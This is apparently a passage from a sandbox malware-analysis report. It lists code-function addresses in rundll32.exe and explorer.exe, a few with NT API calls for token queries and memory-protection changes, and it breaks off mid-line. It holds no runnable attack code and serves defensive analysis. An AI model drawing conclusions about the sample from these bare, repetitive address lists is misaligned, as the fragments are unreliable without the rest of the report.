            Source: C:\Windows\System32\rundll32.exeCode function: 32_2_000001B5767B6F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,32_2_000001B5767B6F64
            Source: C:\Windows\System32\rundll32.exeCode function: 32_2_000001B5767A33F8 NtQueryInformationProcess,32_2_000001B5767A33F8
            Source: C:\Windows\System32\rundll32.exeCode function: 32_2_000001B5767E1003 NtProtectVirtualMemory,NtProtectVirtualMemory,32_2_000001B5767E1003
            Source: C:\Windows\explorer.exeCode function: 29_2_04D0FD7C29_2_04D0FD7C
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE473429_2_04CE4734
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE390829_2_04CE3908
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE7CCC29_2_04CE7CCC
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE34A029_2_04CE34A0
            Source: C:\Windows\explorer.exeCode function: 29_2_04CEBC1C29_2_04CEBC1C
            Source: C:\Windows\explorer.exeCode function: 29_2_04CF743429_2_04CF7434
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE3D8129_2_04CE3D81
            Source: C:\Windows\explorer.exeCode function: 29_2_04CFEDA029_2_04CFEDA0
            Source: C:\Windows\explorer.exeCode function: 29_2_04CEB55C29_2_04CEB55C
            Source: C:\Windows\explorer.exeCode function: 29_2_04CF7D6029_2_04CF7D60
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE457829_2_04CE4578
            Source: C:\Windows\explorer.exeCode function: 29_2_04D0AD2829_2_04D0AD28
            Source: C:\Windows\explorer.exeCode function: 29_2_04CFAE8029_2_04CFAE80
            Source: C:\Windows\explorer.exeCode function: 29_2_04D02E0429_2_04D02E04
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE562829_2_04CE5628
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE8FC829_2_04CE8FC8
            Source: C:\Windows\explorer.exeCode function: 29_2_04CF9FD029_2_04CF9FD0
            Source: C:\Windows\explorer.exeCode function: 29_2_04D0DFF829_2_04D0DFF8
            Source: C:\Windows\explorer.exeCode function: 29_2_04CF07AC29_2_04CF07AC
            Source: C:\Windows\explorer.exeCode function: 29_2_04CEAF4429_2_04CEAF44
            Source: C:\Windows\explorer.exeCode function: 29_2_04D01F7429_2_04D01F74
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE9F7C29_2_04CE9F7C
            Source: C:\Windows\explorer.exeCode function: 29_2_04D0D72C29_2_04D0D72C
            Source: C:\Windows\explorer.exeCode function: 29_2_04D0B0F829_2_04D0B0F8
            Source: C:\Windows\explorer.exeCode function: 29_2_04D0F8E829_2_04D0F8E8
            Source: C:\Windows\explorer.exeCode function: 29_2_04D0884429_2_04D08844
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE207C29_2_04CE207C
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE882429_2_04CE8824
            Source: C:\Windows\explorer.exeCode function: 29_2_04D059F829_2_04D059F8
            Source: C:\Windows\explorer.exeCode function: 29_2_04CEC18829_2_04CEC188
            Source: C:\Windows\explorer.exeCode function: 29_2_04D0610C29_2_04D0610C
            Source: C:\Windows\explorer.exeCode function: 29_2_04CEA2EC29_2_04CEA2EC
            Source: C:\Windows\explorer.exeCode function: 29_2_04D082E029_2_04D082E0
            Source: C:\Windows\explorer.exeCode function: 29_2_04CF6A7429_2_04CF6A74
            Source: C:\Windows\explorer.exeCode function: 29_2_04D0D26C29_2_04D0D26C
            Source: C:\Windows\explorer.exeCode function: 29_2_04CFCA0429_2_04CFCA04
            Source: C:\Windows\explorer.exeCode function: 29_2_04CF021C29_2_04CF021C
            Source: C:\Windows\explorer.exeCode function: 29_2_04CEEBAC29_2_04CEEBAC
            Source: C:\Windows\explorer.exeCode function: 29_2_04CF0BB029_2_04CF0BB0
            Source: C:\Windows\explorer.exeCode function: 29_2_04D0035429_2_04D00354
            Source: C:\Windows\explorer.exeCode function: 29_2_04CFE35C29_2_04CFE35C
            Source: C:\Windows\explorer.exeCode function: 29_2_04D0934429_2_04D09344
            Source: C:\Windows\explorer.exeCode function: 29_2_04CE7B1429_2_04CE7B14
            Source: C:\Windows\explorer.exe